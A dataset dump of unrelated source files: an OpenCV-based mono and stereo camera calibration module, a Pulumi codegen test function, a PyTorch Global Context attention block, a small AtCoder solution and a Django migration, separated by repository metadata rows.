"projection",
" ".join("%8f" % p[0,i] for i in range(4)),
" ".join("%8f" % p[1,i] for i in range(4)),
" ".join("%8f" % p[2,i] for i in range(4)),
""
])
assert len(calmessage) < 525, "Calibration info must be less than 525 bytes"
return calmessage
@staticmethod
def lryaml(name, d, k, r, p, size, cam_model):
def format_mat(x, precision):
return ("[%s]" % (
numpy.array2string(x, precision=precision, suppress_small=True, separator=", ")
.replace("[", "").replace("]", "").replace("\n", "\n ")
))
dist_model = _get_dist_model(d, cam_model)
assert k.shape == (3, 3)
assert r.shape == (3, 3)
assert p.shape == (3, 4)
calmessage = "\n".join([
"image_width: %d" % size[0],
"image_height: %d" % size[1],
"camera_name: " + name,
"camera_matrix:",
" rows: 3",
" cols: 3",
" data: " + format_mat(k, 5),
"camera_model: " + dist_model,
"distortion_coefficients:",
" rows: 1",
" cols: %d" % d.size,
" data: [%s]" % ", ".join("%8f" % x for x in d.flat),
"rectification_matrix:",
" rows: 3",
" cols: 3",
" data: " + format_mat(r, 8),
"projection_matrix:",
" rows: 3",
" cols: 4",
" data: " + format_mat(p, 5),
""
])
return calmessage
def do_save(self):
filename = '/tmp/calibrationdata.tar.gz'
tf = tarfile.open(filename, 'w:gz')
self.do_tarfile_save(tf) # Must be overridden in subclasses
tf.close()
print(("Wrote calibration data to", filename))
def image_from_archive(archive, name):
"""
Load image PGM file from tar archive.
Used for tarfile loading and unit test.
"""
member = archive.getmember(name)
imagefiledata = numpy.fromstring(archive.extractfile(member).read(), numpy.uint8)
imagefiledata.resize((1, imagefiledata.size))
return cv2.imdecode(imagefiledata, cv2.IMREAD_COLOR)
class ImageDrawable(object):
"""
Passed to CalibrationNode after image handled. Allows plotting of images
with detected corner points
"""
def __init__(self):
self.params = None
class MonoDrawable(ImageDrawable):
def __init__(self):
ImageDrawable.__init__(self)
self.scrib = None
self.linear_error = -1.0
class StereoDrawable(ImageDrawable):
def __init__(self):
ImageDrawable.__init__(self)
self.lscrib = None
self.rscrib = None
self.epierror = -1
self.dim = -1
class MonoCalibrator(Calibrator):
"""
Calibration class for monocular cameras::
images = [cv2.imread("mono%d.png") for i in range(8)]
mc = MonoCalibrator()
mc.cal(images)
print mc.as_message()
"""
is_mono = True # TODO Could get rid of is_mono
def __init__(self, *args, **kwargs):
if 'name' not in kwargs:
kwargs['name'] = 'narrow_stereo/left'
super(MonoCalibrator, self).__init__(*args, **kwargs)
def cal(self, images):
"""
Calibrate camera from given images
"""
goodcorners = self.collect_corners(images)
self.cal_fromcorners(goodcorners)
self.calibrated = True
def collect_corners(self, images):
"""
:param images: source images containing chessboards
:type images: list of :class:`cvMat`
Find chessboards in all images.
Return [ (corners, ChessboardInfo) ]
"""
self.size = (images[0].shape[1], images[0].shape[0])
corners = [self.get_corners(i) for i in images]
goodcorners = [(co, b) for (ok, co, b) in corners if ok]
if not goodcorners:
raise CalibrationException("No corners found in images!")
return goodcorners
def cal_fromcorners(self, good):
"""
:param good: Good corner positions and boards
:type good: [(corners, ChessboardInfo)]
"""
boards = [ b for (_, b) in good ]
ipts = [ points for (points, _) in good ]
opts = self.mk_object_points(boards)
# If FIX_ASPECT_RATIO flag set, enforce focal lengths have 1/1 ratio
intrinsics_in = numpy.eye(3, dtype=numpy.float64)
if self.camera_model == CAMERA_MODEL.PINHOLE:
reproj_err, self.intrinsics, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(
opts, ipts,
self.size,
intrinsics_in,
None,
flags = self.calib_flags)
# OpenCV returns more than 8 coefficients (the additional ones all zeros) when CALIB_RATIONAL_MODEL is set.
# The extra ones include e.g. thin prism coefficients, which we are not interested in.
self.distortion = dist_coeffs.flat[:8].reshape(-1, 1)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
reproj_err, self.intrinsics, self.distortion, rvecs, tvecs = cv2.fisheye.calibrate(
opts, ipts, self.size,
intrinsics_in, None, flags = self.fisheye_calib_flags)
# R is identity matrix for monocular calibration
self.R = numpy.eye(3, dtype=numpy.float64)
self.P = numpy.zeros((3, 4), dtype=numpy.float64)
self.set_alpha(0.0)
def set_alpha(self, a):
"""
Set the alpha value for the calibrated camera solution. The alpha
value is a zoom, and ranges from 0 (zoomed in, all pixels in
calibrated image are valid) to 1 (zoomed out, all pixels in
original image are in calibrated image).
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
# NOTE: Prior to Electric, this code was broken such that we never actually saved the new
# camera matrix. In effect, this enforced P = [K|0] for monocular cameras.
# TODO: Verify that OpenCV #1199 gets applied (improved GetOptimalNewCameraMatrix)
ncm, _ = cv2.getOptimalNewCameraMatrix(self.intrinsics, self.distortion, self.size, a)
for j in range(3):
for i in range(3):
self.P[j,i] = ncm[j, i]
self.mapx, self.mapy = cv2.initUndistortRectifyMap(self.intrinsics, self.distortion, self.R, ncm, self.size, cv2.CV_32FC1)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
# NOTE: estimateNewCameraMatrixForUndistortRectify not producing proper results, using a naive approach instead:
self.P[:3,:3] = self.intrinsics[:3,:3]
self.P[0,0] /= (1. + a)
self.P[1,1] /= (1. + a)
self.mapx, self.mapy = cv2.fisheye.initUndistortRectifyMap(self.intrinsics, self.distortion, self.R, self.P, self.size, cv2.CV_32FC1)
def remap(self, src):
"""
:param src: source image
:type src: :class:`cvMat`
Apply the post-calibration undistortion to the source image
"""
return cv2.remap(src, self.mapx, self.mapy, cv2.INTER_LINEAR)
def undistort_points(self, src):
"""
:param src: N source pixel points (u,v) as an Nx2 matrix
:type src: :class:`cvMat`
Apply the post-calibration undistortion to the source points
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
return cv2.undistortPoints(src, self.intrinsics, self.distortion, R = self.R, P = self.P)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
return cv2.fisheye.undistortPoints(src, self.intrinsics, self.distortion, R = self.R, P = self.P)
def as_message(self):
""" Return the camera calibration as a CameraInfo message """
return self.lrmsg(self.distortion, self.intrinsics, self.R, self.P, self.size, self.camera_model)
def from_message(self, msg, alpha = 0.0):
""" Initialize the camera calibration from a CameraInfo message """
self.size = (msg.width, msg.height)
self.intrinsics = numpy.array(msg.K, dtype=numpy.float64, copy=True).reshape((3, 3))
self.distortion = numpy.array(msg.D, dtype=numpy.float64, copy=True).reshape((len(msg.D), 1))
self.R = numpy.array(msg.R, dtype=numpy.float64, copy=True).reshape((3, 3))
self.P = numpy.array(msg.P, dtype=numpy.float64, copy=True).reshape((3, 4))
self.set_alpha(0.0)
def report(self):
self.lrreport(self.distortion, self.intrinsics, self.R, self.P)
def ost(self):
return self.lrost(self.name, self.distortion, self.intrinsics, self.R, self.P, self.size)
def yaml(self):
return self.lryaml(self.name, self.distortion, self.intrinsics, self.R, self.P, self.size, self.camera_model)
def linear_error_from_image(self, image):
"""
Detect the checkerboard and compute the linear error.
Mainly for use in tests.
"""
_, corners, _, board, _ = self.downsample_and_detect(image)
if corners is None:
return None
undistorted = self.undistort_points(corners)
return self.linear_error(undistorted, board)
@staticmethod
def linear_error(corners, b):
"""
Returns the linear error for a set of corners detected in the unrectified image.
"""
if corners is None:
return None
def pt2line(x0, y0, x1, y1, x2, y2):
""" point is (x0, y0), line is (x1, y1, x2, y2) """
return abs((x2 - x1) * (y1 - y0) - (x1 - x0) * (y2 - y1)) / math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
cc = b.n_cols
cr = b.n_rows
errors = []
for r in range(cr):
(x1, y1) = corners[(cc * r) + 0, 0]
(x2, y2) = corners[(cc * r) + cc - 1, 0]
for i in range(1, cc - 1):
(x0, y0) = corners[(cc * r) + i, 0]
errors.append(pt2line(x0, y0, x1, y1, x2, y2))
if errors:
return math.sqrt(sum([e**2 for e in errors]) / len(errors))
else:
return None
def handle_msg(self, msg):
"""
Detects the calibration target and, if found and provides enough new information,
adds it to the sample database.
Returns a MonoDrawable message with the display image and progress info.
"""
gray = self.mkgray(msg)
linear_error = -1
# Get display-image-to-be (scrib) and detection of the calibration target
scrib_mono, corners, downsampled_corners, board, (x_scale, y_scale) = self.downsample_and_detect(gray)
if self.calibrated:
# Show rectified image
# TODO Pull out downsampling code into function
gray_remap = self.remap(gray)
gray_rect = gray_remap
if x_scale != 1.0 or y_scale != 1.0:
gray_rect = cv2.resize(gray_remap, (scrib_mono.shape[1], scrib_mono.shape[0]))
scrib = cv2.cvtColor(gray_rect, cv2.COLOR_GRAY2BGR)
if corners is not None:
# Report linear error
undistorted = self.undistort_points(corners)
linear_error = self.linear_error(undistorted, board)
# Draw rectified corners
scrib_src = undistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(scrib, (board.n_cols, board.n_rows), scrib_src, True)
else:
scrib = cv2.cvtColor(scrib_mono, cv2.COLOR_GRAY2BGR)
if corners is not None:
# Draw (potentially downsampled) corners onto display image
cv2.drawChessboardCorners(scrib, (board.n_cols, board.n_rows), downsampled_corners, True)
# Add sample to database only if it's sufficiently different from any previous sample.
params = self.get_parameters(corners, board, (gray.shape[1], gray.shape[0]))
if self.is_good_sample(params, corners, self.last_frame_corners):
self.db.append((params, gray))
self.good_corners.append((corners, board))
print(("*** Added sample %d, p_x = %.3f, p_y = %.3f, p_size = %.3f, skew = %.3f" % tuple([len(self.db)] + params)))
self.last_frame_corners = corners
rv = MonoDrawable()
rv.scrib = scrib
rv.params = self.compute_goodenough()
rv.linear_error = linear_error
return rv
def do_calibration(self, dump = False):
if not self.good_corners:
print("**** Collecting corners for all images! ****") #DEBUG
images = [i for (p, i) in self.db]
self.good_corners = self.collect_corners(images)
self.size = (self.db[0][1].shape[1], self.db[0][1].shape[0]) # TODO Needs to be set externally
# Dump should only occur if user wants it
if dump:
pickle.dump((self.is_mono, self.size, self.good_corners),
open("/tmp/camera_calibration_%08x.pickle" % random.getrandbits(32), "w"))
self.cal_fromcorners(self.good_corners)
self.calibrated = True
# DEBUG
print((self.report()))
print((self.ost()))
def do_tarfile_save(self, tf):
""" Write images and calibration solution to a tarfile object """
def taradd(name, buf):
if isinstance(buf, basestring):
s = StringIO(buf)
else:
s = BytesIO(buf)
ti = tarfile.TarInfo(name)
ti.size = len(s.getvalue())
ti.uname = 'calibrator'
ti.mtime = int(time.time())
tf.addfile(tarinfo=ti, fileobj=s)
ims = [("left-%04d.png" % i, im) for i,(_, im) in enumerate(self.db)]
for (name, im) in ims:
taradd(name, cv2.imencode(".png", im)[1].tostring())
taradd('ost.yaml', self.yaml())
taradd('ost.txt', self.ost())
def do_tarfile_calibration(self, filename):
archive = tarfile.open(filename, 'r')
limages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('left') and (f.endswith('.pgm') or f.endswith('png'))) ]
self.cal(limages)
# TODO Replicate MonoCalibrator improvements in stereo
class StereoCalibrator(Calibrator):
"""
Calibration class for stereo cameras::
limages = [cv2.imread("left%d.png") for i in range(8)]
rimages = [cv2.imread("right%d.png") for i in range(8)]
sc = StereoCalibrator()
sc.cal(limages, rimages)
print sc.as_message()
"""
is_mono = False
def __init__(self, *args, **kwargs):
if 'name' not in kwargs:
kwargs['name'] = 'narrow_stereo'
super(StereoCalibrator, self).__init__(*args, **kwargs)
self.l = MonoCalibrator(*args, **kwargs)
self.r = MonoCalibrator(*args, **kwargs)
# Collecting from two cameras in a horizontal stereo rig, can't get
# full X range in the left camera.
self.param_ranges[0] = 0.4
def cal(self, limages, rimages):
"""
:param limages: source left images containing chessboards
:type limages: list of :class:`cvMat`
:param rimages: source right images containing chessboards
:type rimages: list of :class:`cvMat`
Find chessboards in images, and runs the OpenCV calibration solver.
"""
goodcorners = self.collect_corners(limages, rimages)
self.size = (limages[0].shape[1], limages[0].shape[0])
self.l.size = self.size
self.r.size = self.size
self.cal_fromcorners(goodcorners)
self.calibrated = True
def collect_corners(self, limages, rimages):
"""
For a sequence of left and right images, find pairs of images where both
left and right have a chessboard, and return their corners as a list of pairs.
"""
# Pick out (corners, board) tuples
lcorners = [ self.downsample_and_detect(i)[1:4:2] for i in limages]
rcorners = [ self.downsample_and_detect(i)[1:4:2] for i in rimages]
good = [(lco, rco, b) for ((lco, b), (rco, br)) in zip( lcorners, rcorners)
if (lco is not None and rco is not None)]
if len(good) == 0:
raise CalibrationException("No corners found in images!")
return good
def cal_fromcorners(self, good):
# Perform monocular calibrations
lcorners = [(l, b) for (l, r, b) in good]
rcorners = [(r, b) for (l, r, b) in good]
self.l.cal_fromcorners(lcorners)
self.r.cal_fromcorners(rcorners)
lipts = [ l for (l, _, _) in good ]
ripts = [ r for (_, r, _) in good ]
boards = [ b for (_, _, b) in good ]
opts = self.mk_object_points(boards, True)
flags = cv2.CALIB_FIX_INTRINSIC
self.T = numpy.zeros((3, 1), dtype=numpy.float64)
self.R = numpy.eye(3, dtype=numpy.float64)
if self.camera_model == CAMERA_MODEL.PINHOLE:
if LooseVersion(cv2.__version__).version[0] == 2:
cv2.stereoCalibrate(opts, lipts, ripts, self.size,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5),
flags = flags)
else:
cv2.stereoCalibrate(opts, lipts, ripts,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5),
flags = flags)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
if LooseVersion(cv2.__version__).version[0] == 2:
print("ERROR: You need OpenCV >3 to use fisheye camera model")
sys.exit()
else:
cv2.fisheye.stereoCalibrate(opts, lipts, ripts,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5), # 30, 1e-6
flags = flags)
self.set_alpha(0.0)
def set_alpha(self, a):
"""
Set the alpha value for the calibrated camera solution. The
alpha value is a zoom, and ranges from 0 (zoomed in, all pixels
in calibrated image are valid) to 1 (zoomed out, all pixels in
original image are in calibrated image).
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
cv2.stereoRectify(self.l.intrinsics,
self.l.distortion,
self.r.intrinsics,
self.r.distortion,
self.size,
self.R,
self.T,
self.l.R, self.r.R, self.l.P, self.r.P,
alpha = a)
cv2.initUndistortRectifyMap(self.l.intrinsics, self.l.distortion, self.l.R, self.l.P, self.size, cv2.CV_32FC1,
self.l.mapx, self.l.mapy)
cv2.initUndistortRectifyMap(self.r.intrinsics, self.r.distortion, self.r.R, self.r.P, self.size, cv2.CV_32FC1,
self.r.mapx, self.r.mapy)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
self.Q = numpy.zeros((4,4), dtype=numpy.float64)
flags = cv2.CALIB_ZERO_DISPARITY # Operation flags that may be zero or CALIB_ZERO_DISPARITY .
# If the flag is set, the function makes the principal points of each camera have the same pixel coordinates in the rectified views.
# And if the flag is not set, the function may still shift the images in the horizontal or vertical direction
# (depending on the orientation of epipolar lines) to maximize the useful image area.
cv2.fisheye.stereoRectify(self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, self.T,
flags,
self.l.R, self.r.R,
self.l.P, self.r.P,
self.Q,
self.size,
a,
1.0 )
self.l.P[:3,:3] = numpy.dot(self.l.intrinsics,self.l.R)
self.r.P[:3,:3] = numpy.dot(self.r.intrinsics,self.r.R)
cv2.fisheye.initUndistortRectifyMap(self.l.intrinsics, self.l.distortion, self.l.R, self.l.intrinsics, self.size, cv2.CV_32FC1,
self.l.mapx, self.l.mapy)
cv2.fisheye.initUndistortRectifyMap(self.r.intrinsics, self.r.distortion, self.r.R, self.r.intrinsics, self.size, cv2.CV_32FC1,
self.r.mapx, self.r.mapy)
def as_message(self):
"""
Return the camera calibration as a pair of CameraInfo messages, for left
and right cameras respectively.
"""
return (self.lrmsg(self.l.distortion, self.l.intrinsics, self.l.R, self.l.P, self.size, self.l.camera_model),
self.lrmsg(self.r.distortion, self.r.intrinsics, self.r.R, self.r.P, self.size, self.r.camera_model))
def from_message(self, msgs, alpha = 0.0):
""" Initialize the camera calibration from a pair of CameraInfo messages. """
self.size = (msgs[0].width, msgs[0].height)
self.T = numpy.zeros((3, 1), dtype=numpy.float64)
self.R = numpy.eye(3, dtype=numpy.float64)
self.l.from_message(msgs[0])
self.r.from_message(msgs[1])
# Need to compute self.T and self.R here, using the monocular parameters above
if False:
self.set_alpha(0.0)
def report(self):
print("\nLeft:")
self.lrreport(self.l.distortion, self.l.intrinsics, self.l.R, self.l.P)
print("\nRight:")
self.lrreport(self.r.distortion, self.r.intrinsics, self.r.R, self.r.P)
print("self.T =", numpy.ravel(self.T).tolist())
print("self.R =", numpy.ravel(self.R).tolist())
def ost(self):
return (self.lrost(self.name + "/left", self.l.distortion, self.l.intrinsics, self.l.R, self.l.P, self.size) +
self.lrost(self.name + "/right", self.r.distortion, self.r.intrinsics, self.r.R, self.r.P, self.size))
def yaml(self, suffix, info):
return self.lryaml(self.name + suffix, info.distortion, info.intrinsics, info.R, info.P, self.size, self.camera_model)
# TODO Get rid of "from_images" versions of these, instead have function to get undistorted corners
def epipolar_error_from_images(self, limage, rimage):
"""
Detect the checkerboard in both images and compute the epipolar error.
Mainly for use in tests.
"""
lcorners = self.downsample_and_detect(limage)[1]
rcorners = self.downsample_and_detect(rimage)[1]
if lcorners is None or rcorners is None:
return None
lundistorted = self.l.undistort_points(lcorners)
rundistorted = self.r.undistort_points(rcorners)
return self.epipolar_error(lundistorted, rundistorted)
def epipolar_error(self, lcorners, rcorners):
"""
Compute the epipolar error from two sets of matching undistorted points
"""
d = lcorners[:,:,1] - rcorners[:,:,1]
return numpy.sqrt(numpy.square(d).sum() / d.size)
def chessboard_size_from_images(self, limage, rimage):
_, lcorners, _, board, _ = self.downsample_and_detect(limage)
_, rcorners, _, board, _ = self.downsample_and_detect(rimage)
if lcorners is None or rcorners is None:
return None
lundistorted = self.l.undistort_points(lcorners)
rundistorted = self.r.undistort_points(rcorners)
return self.chessboard_size(lundistorted, rundistorted, board)
def chessboard_size(self, lcorners, rcorners, board, msg = None):
"""
Compute the square edge length from two sets of matching undistorted points
given the current calibration.
:param msg: a tuple of (left_msg, right_msg)
"""
# Project the points to 3d
cam = image_geometry.StereoCameraModel()
if msg == None:
msg = self.as_message()
cam.fromCameraInfo(*msg)
disparities = lcorners[:,:,0] - rcorners[:,:,0]
pt3d = [cam.projectPixelTo3d((lcorners[i,0,0], lcorners[i,0,1]), disparities[i,0]) for i in range(lcorners.shape[0]) ]
def l2(p0, p1):
return math.sqrt(sum([(c0 - c1) ** 2 for (c0, c1) in zip(p0, p1)]))
# Compute the length from each horizontal and vertical line, and return the mean
cc = board.n_cols
cr = board.n_rows
lengths = (
[l2(pt3d[cc * r + 0], pt3d[cc * r + (cc - 1)]) / (cc - 1) for r in range(cr)] +
[l2(pt3d[c + 0], pt3d[c + (cc * (cr - 1))]) / (cr - 1) for c in range(cc)])
return sum(lengths) / len(lengths)
def handle_msg(self, msg):
# TODO Various asserts that images have same dimension, same board detected...
(lmsg, rmsg) = msg
lgray = self.mkgray(lmsg)
rgray = self.mkgray(rmsg)
epierror = -1
# Get display-images-to-be and detections of the calibration target
lscrib_mono, lcorners, ldownsampled_corners, lboard, (x_scale, y_scale) = self.downsample_and_detect(lgray)
rscrib_mono, rcorners, rdownsampled_corners, rboard, _ = self.downsample_and_detect(rgray)
if self.calibrated:
# Show rectified images
lremap = self.l.remap(lgray)
rremap = self.r.remap(rgray)
lrect = lremap
rrect = rremap
if x_scale != 1.0 or y_scale != 1.0:
lrect = cv2.resize(lremap, (lscrib_mono.shape[1], lscrib_mono.shape[0]))
rrect = cv2.resize(rremap, (rscrib_mono.shape[1], rscrib_mono.shape[0]))
lscrib = cv2.cvtColor(lrect, cv2.COLOR_GRAY2BGR)
rscrib = cv2.cvtColor(rrect, cv2.COLOR_GRAY2BGR)
# Draw rectified corners
if lcorners is not None:
lundistorted = self.l.undistort_points(lcorners)
scrib_src = lundistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(lscrib, (lboard.n_cols, lboard.n_rows), scrib_src, True)
if rcorners is not None:
rundistorted = self.r.undistort_points(rcorners)
scrib_src = rundistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(rscrib, (rboard.n_cols, rboard.n_rows), scrib_src, True)
# Report epipolar error
if lcorners is not None and rcorners is not None and len(lcorners) == len(rcorners):
epierror = self.epipolar_error(lundistorted, rundistorted)
else:
lscrib = cv2.cvtColor(lscrib_mono, cv2.COLOR_GRAY2BGR)
rscrib = cv2.cvtColor(rscrib_mono, cv2.COLOR_GRAY2BGR)
# Draw any detected chessboards onto display (downsampled) images
if lcorners is not None:
cv2.drawChessboardCorners(lscrib, (lboard.n_cols, lboard.n_rows),
ldownsampled_corners, True)
if rcorners is not None:
cv2.drawChessboardCorners(rscrib, (rboard.n_cols, rboard.n_rows),
rdownsampled_corners, True)
# Add sample to database only if it's sufficiently different from any previous sample
if lcorners is not None and rcorners is not None and len(lcorners) == len(rcorners):
params = self.get_parameters(lcorners, lboard, (lgray.shape[1], lgray.shape[0]))
if self.is_good_sample(params, lcorners, self.last_frame_corners):
self.db.append( (params, lgray, rgray) )
self.good_corners.append( (lcorners, rcorners, lboard) )
print(("*** Added sample %d, p_x = %.3f, p_y = %.3f, p_size = %.3f, skew = %.3f" % tuple([len(self.db)] + params)))
self.last_frame_corners = lcorners
rv = StereoDrawable()
rv.lscrib = lscrib
rv.rscrib = rscrib
rv.params = self.compute_goodenough()
rv.epierror = epierror
return rv
def do_calibration(self, dump = False):
# TODO MonoCalibrator collects corners if needed here
self.size = (self.db[0][1].shape[1], self.db[0][1].shape[0]) # TODO Needs to be set externally
# Dump should only occur if user wants it
if dump:
pickle.dump((self.is_mono, self.size, self.good_corners),
open("/tmp/camera_calibration_%08x.pickle" % random.getrandbits(32), "w"))
self.l.size = self.size
self.r.size = self.size
self.cal_fromcorners(self.good_corners)
self.calibrated = True
# DEBUG
print((self.report()))
print((self.ost()))
def do_tarfile_save(self, tf):
""" Write images and calibration solution to a tarfile object """
ims = ([("left-%04d.png" % i, im) for i,(_, im, _) in enumerate(self.db)] +
[("right-%04d.png" % i, im) for i,(_, _, im) in enumerate(self.db)])
def taradd(name, buf):
if isinstance(buf, basestring):
s = StringIO(buf)
else:
s = BytesIO(buf)
ti = tarfile.TarInfo(name)
ti.size = len(s.getvalue())
ti.uname = 'calibrator'
ti.mtime = int(time.time())
tf.addfile(tarinfo=ti, fileobj=s)
for (name, im) in ims:
taradd(name, cv2.imencode(".png", im)[1].tostring())
taradd('left.yaml', self.yaml("/left", self.l))
taradd('right.yaml', self.yaml("/right", self.r))
taradd('ost.txt', self.ost())
def do_tarfile_calibration(self, filename):
archive = tarfile.open(filename, 'r')
limages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('left') and (f.endswith('pgm') or f.endswith('png'))) ]
rimages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('right') and (f.endswith('pgm') or f.endswith('png'))) ]
if not len(limages) == len(rimages):
raise CalibrationException("Left, right images don't match. %d left images, %d right" % (len(limages), len(rimages)))
##\todo Check that the filenames match and stuff
self.cal(limages, rimages)
| [
"[email protected]"
] | |
02d805ec2da1c542813f48e2d36487ea8c3282fd | 54a18823b019112c53fc62766da10cbe5f879615 | /pkg/codegen/internal/test/testdata/output-funcs/py_tests/funcWithConstInput.py | d3ba8492d878603b3f22f3f1d551e00dbb14a2fe | [
"Apache-2.0"
] | permissive | TrendingTechnology/pulumi | 01904487b2560244c3588004b562571f85cf2e51 | 1a4f36e97b15e6a25d92a8ebbabd5238c6c5be54 | refs/heads/master | 2023-07-27T19:38:17.162679 | 2021-09-16T04:12:49 | 2021-09-16T04:12:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | # coding=utf-8
# *** WARNING: this file was generated by . ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'func_with_const_input',
]
def func_with_const_input(plain_input: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None):
"""
Codegen demo with const inputs
"""
__args__ = dict()
__args__['plainInput'] = plain_input
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('madeup-package:codegentest:funcWithConstInput', __args__, opts=opts).value
| [
"[email protected]"
] | |
be9142c193081f1a1035d6f272c22cc11c1b0e9d | 2bc8f66fd34ba1b93de82c67954a10f8b300b07e | /general_backbone/layers/global_context.py | 0c80d60097c862eb96f2e9085a77dbbde1fa354a | [] | no_license | DoDucNhan/general_backbone | 7dabffed5a74e622ba23bf275358ca2d09faddc1 | 686c92ab811221d594816207d86a0b97c9b4bc73 | refs/heads/main | 2023-08-31T14:59:23.873555 | 2021-10-23T06:34:14 | 2021-10-23T06:34:14 | 420,419,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,449 | py | # Copyright (c) general_backbone. All rights reserved.
""" Global Context Attention Block
Paper: `GCNet: Non-local Networks Meet Squeeze-Excitation Networks and Beyond`
- https://arxiv.org/abs/1904.11492
Official code consulted as reference: https://github.com/xvjiarui/GCNet
"""
from torch import nn as nn
import torch.nn.functional as F
from .create_act import create_act_layer, get_act_layer
from .helpers import make_divisible
from .mlp import ConvMlp
from .norm import LayerNorm2d
class GlobalContext(nn.Module):
def __init__(self, channels, use_attn=True, fuse_add=False, fuse_scale=True, init_last_zero=False,
rd_ratio=1./8, rd_channels=None, rd_divisor=1, act_layer=nn.ReLU, gate_layer='sigmoid'):
super(GlobalContext, self).__init__()
act_layer = get_act_layer(act_layer)
self.conv_attn = nn.Conv2d(channels, 1, kernel_size=1, bias=True) if use_attn else None
if rd_channels is None:
rd_channels = make_divisible(channels * rd_ratio, rd_divisor, round_limit=0.)
if fuse_add:
self.mlp_add = ConvMlp(channels, rd_channels, act_layer=act_layer, norm_layer=LayerNorm2d)
else:
self.mlp_add = None
if fuse_scale:
self.mlp_scale = ConvMlp(channels, rd_channels, act_layer=act_layer, norm_layer=LayerNorm2d)
else:
self.mlp_scale = None
self.gate = create_act_layer(gate_layer)
self.init_last_zero = init_last_zero
self.reset_parameters()
def reset_parameters(self):
if self.conv_attn is not None:
nn.init.kaiming_normal_(self.conv_attn.weight, mode='fan_in', nonlinearity='relu')
if self.mlp_add is not None:
nn.init.zeros_(self.mlp_add.fc2.weight)
def forward(self, x):
B, C, H, W = x.shape
if self.conv_attn is not None:
attn = self.conv_attn(x).reshape(B, 1, H * W) # (B, 1, H * W)
attn = F.softmax(attn, dim=-1).unsqueeze(3) # (B, 1, H * W, 1)
context = x.reshape(B, C, H * W).unsqueeze(1) @ attn
context = context.view(B, C, 1, 1)
else:
context = x.mean(dim=(2, 3), keepdim=True)
if self.mlp_scale is not None:
mlp_x = self.mlp_scale(context)
x = x * self.gate(mlp_x)
if self.mlp_add is not None:
mlp_x = self.mlp_add(context)
x = x + mlp_x
return x
| [
"[email protected]"
] | |
162e921c3a9621f4f8e877078a58211b9278b0a5 | f6bba50fccc6fb0dae2f046193434cfb4b9d32d5 | /121/A.py | 9289baf98b8a4ddbe3c1fee1117da72c3e424709 | [] | no_license | seven320/AtCoder | 4c26723d20004fe46ce118b882faabc05066841c | 45e301e330e817f1ace4be4088d3babe18588170 | refs/heads/master | 2021-11-22T22:57:32.290504 | 2021-10-24T09:15:12 | 2021-10-24T09:15:12 | 162,827,473 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | # encoding:utf-8
import copy
import numpy as np
import random
H,W = map(int,input().split())
h,w = map(int,input().split())
ans = H*W
ans -= (h*W+H*w)
ans += h*w
print(ans)
| [
"[email protected]"
] | |
d39063fe831b550fc02fc674df6797f6774dc2af | 2b4af8810511b5f1ed47fdf5662753b9b4af76b8 | /custom/enikshay/private_sector_datamigration/migrations/0003_auto_20170513_1805.py | fbfb08937806346ac17af7cf5bbc2706612319a5 | [] | no_license | DeckOfPandas/commcare-wddcp | 55bde89197ec5bc4a4b53d327ec6a811aec0d752 | 810d2e09d3890e3d0d70178745da5924c1db767b | refs/heads/dimagi | 2020-12-02T19:19:53.992796 | 2017-06-30T15:18:16 | 2017-07-05T12:23:26 | 96,325,707 | 1 | 0 | null | 2017-07-05T14:02:49 | 2017-07-05T14:02:49 | null | UTF-8 | Python | false | false | 477 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-13 18:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('private_sector_datamigration', '0002_auto_20170512_1919'),
]
operations = [
migrations.AlterField(
model_name='adherence',
name='episodeId',
field=models.CharField(max_length=8),
),
]
| [
"[email protected]"
] | |
